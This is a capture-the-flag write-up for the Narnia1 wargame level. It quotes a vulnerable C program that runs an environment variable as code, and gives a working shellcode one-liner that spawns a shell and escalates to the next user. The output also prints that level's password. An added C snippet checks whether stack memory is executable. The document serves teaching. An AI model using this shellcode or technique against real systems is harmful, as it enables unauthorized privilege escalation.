The source code of Narnia1 is as follows:

    /*
        This program is free software; you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation; either version 2 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program; if not, write to the Free Software
        Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    */
    #include <stdio.h>

    int main(){
        int (*ret)();

        if(getenv("EGG")==NULL){
            printf("Give me something to execute at the env-variable EGG\n");
            exit(1);
        }

        printf("Trying to execute EGG!\n");
        ret = getenv("EGG");
        ret();

        return 0;
    }

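The program stores the pointer returned by getenv("EGG") in the function pointer ret and calls it, so the bytes in EGG run as machine code. Clearly, if we can set the EGG environment variable so that '/bin/sh' is executed directly, we get root. The earlier side-story post already covered how to write shellcode that obtains root privileges. The solution is as follows: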

    narnia1@narnia:/narnia$ export EGG=$(python -c 'print "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"')
    narnia1@narnia:/narnia$ ./narnia1
    Trying to execute EGG!
    $ whoami
    narnia2
    $ cat /etc/narnia_pass/narnia2
    nairiepecu
    $

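The call to ret() only succeeds because the memory holding the environment strings (the process stack on Linux) is mapped executable in this binary; with a non-executable stack the same call faults. The following is an added example, not part of the original write-up or the challenge: it looks up the mapping that contains the EGG string in /proc/self/maps and reports its permissions. The function names perms_for_addr and addr_is_executable are hypothetical, and it assumes Linux with /proc mounted.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Search /proc/<pid>/maps-style text for the mapping that contains addr and
 * copy its permission field (e.g. "rw-p") into perms. Returns 1 if found. */
int perms_for_addr(const char *maps, unsigned long addr, char perms[5])
{
    const char *line = maps;
    while (line && *line) {
        unsigned long lo, hi;
        char p[5];
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, p) == 3 &&
            addr >= lo && addr < hi) {
            memcpy(perms, p, 5);
            return 1;
        }
        line = strchr(line, '\n');   /* advance to the next line, if any */
        if (line) line++;
    }
    return 0;
}

/* 1: mapping is executable, 0: non-executable (a call would fault), -1: unmapped */
int addr_is_executable(const char *maps, unsigned long addr)
{
    char perms[5];
    if (!perms_for_addr(maps, addr, perms)) return -1;
    return perms[2] == 'x';
}

int main(void)
{
    static char buf[1 << 16];
    const char *egg = getenv("EGG");
    FILE *f = fopen("/proc/self/maps", "r");
    if (!egg || !f) {
        fprintf(stderr, "set EGG and run on Linux with /proc mounted\n");
        return 1;
    }
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    buf[n] = '\0';
    fclose(f);
    char perms[5] = "????";
    perms_for_addr(buf, (unsigned long)egg, perms);
    printf("EGG at %p, mapping perms %s, executable=%d\n", (void *)egg, perms,
           addr_is_executable(buf, (unsigned long)egg));
    return 0;
}
```

On a binary built with default hardening the stack line reads rw-p and the program prints executable=0.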
Summary
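All of the challenges in the narnia series come with source code, so compared with other CTF challenges they are much easier to get started with. The difficulty also increases gradually, which makes them friendly to newcomers. This is the link to the article I consulted while solving the challenge (yes, I am a newcomer too). The attachment contains the narnia1 source code and executable.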